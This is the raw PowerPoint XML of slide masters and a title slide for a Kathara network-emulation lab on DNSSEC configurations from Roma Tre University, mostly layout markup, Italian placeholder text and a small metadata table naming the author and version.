          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D054AC4-794D-4989-9E00-3CA5380BB33B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE93C49-2746-445A-8FEE-BFD8EDF009A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="3645024"/>
            <a:ext cx="8534400" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del sottotitolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="614262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01B5F34A-3762-4DC4-8521-3CCFBDBBB557}"/>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5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD2D072-E423-4081-B786-4B5AABE6E907}"/>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1837307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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600"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89786"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F0D3FD9D-035D-4317-87B9-2E07DC513C53}"/>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6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0056CC62-4927-46CE-8071-12D4280A824B}"/>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305026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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E61840-3800-42E1-8104-908EC2290A80}"/>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4" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBDBC235-FCC8-44F7-AF2D-D19BB003DF74}"/>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2212121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210B621-DDDB-4969-8052-9E481273EFD3}"/>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3" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF427022-EF7C-4DDD-9245-E8A971AB8D5C}"/>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485164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247" cy="1162050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4767386" y="273053"/>
            <a:ext cx="681501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3"/>
            <a:ext cx="4011247" cy="4691063"/>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B6B7462A-E94B-4E5C-AF83-8E8FA72FC515}"/>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6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ECA9AC3-825F-4AAC-8B76-9EC322D8ACC1}"/>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301766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554" y="4800600"/>
            <a:ext cx="7315200" cy="566738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto immagine 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389554" y="612775"/>
            <a:ext cx="7315200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457212"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9" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200480" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657691" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT" noProof="0"/>
              <a:t>Fare clic sull'icona per inserire un'immagine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto testo 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389554" y="5367338"/>
            <a:ext cx="7315200" cy="804862"/>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1A58AB6D-2A9D-4F16-A910-0B79968AB2D1}"/>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6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A098BE-69C9-4538-89C8-C00B289910E6}"/>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1946613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44DAC59-5E6E-45D0-8524-3E061722C9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="116632"/>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Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F11B519-1465-43CA-9B06-0B1C84B88C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1412777"/>
            <a:ext cx="10972800" cy="471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03108" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F6A8ACC-B973-483A-9EBB-30DD75AA7EB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9265138" y="6453191"/>
            <a:ext cx="2782277"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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303109" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6276769E-8AF7-4AB3-B25A-CA8C5C6A001F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3120295" y="6453191"/>
            <a:ext cx="5951415"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dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053844C4-97BD-413F-90CB-BB662D34AACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="144584" y="6453191"/>
            <a:ext cx="227900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it-IT" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Computer Networks Research Group Roma Tre University</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A group of cubes with different colors&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BC26E2-2780-755F-DAB8-E568CC768E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3458" y="200174"/>
            <a:ext cx="1264030" cy="852562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49530978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hf sldNum="0" hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457212" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914423" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371634" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828846" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4401">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342908" indent="-342908" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742969" indent="-285757" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">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defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143028" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="66CC00"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600240" indent="-228606"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4pPr>
      <a:lvl5pPr marL="2057452" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514663" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971874" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429086" indent="-228606" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886297" indent="-228606"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it-IT"/>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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>kathara lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7269C1AF-3115-5BC8-A826-7DD11551941F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="124990" name="Group 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B29E1B27-9968-C664-167E-267F5CE28173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1946522440"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2650331" y="3573016"/>
          <a:ext cx="6891338" cy="2531120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2024063">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4867275">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3411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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Version</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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1.1</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106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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Author(s)</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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>D. Villa</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11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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>E-mail</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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>contact@kathara.org</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11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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>http://www.kathara.org/</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364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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>dnssec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> configurations</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FF9EE336-8C6A-EE6F-6B60-0806E93BC623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3451276" y="2165667"/>
            <a:ext cx="5289448" cy="2526665"/>
            <a:chOff x="126" y="3294"/>
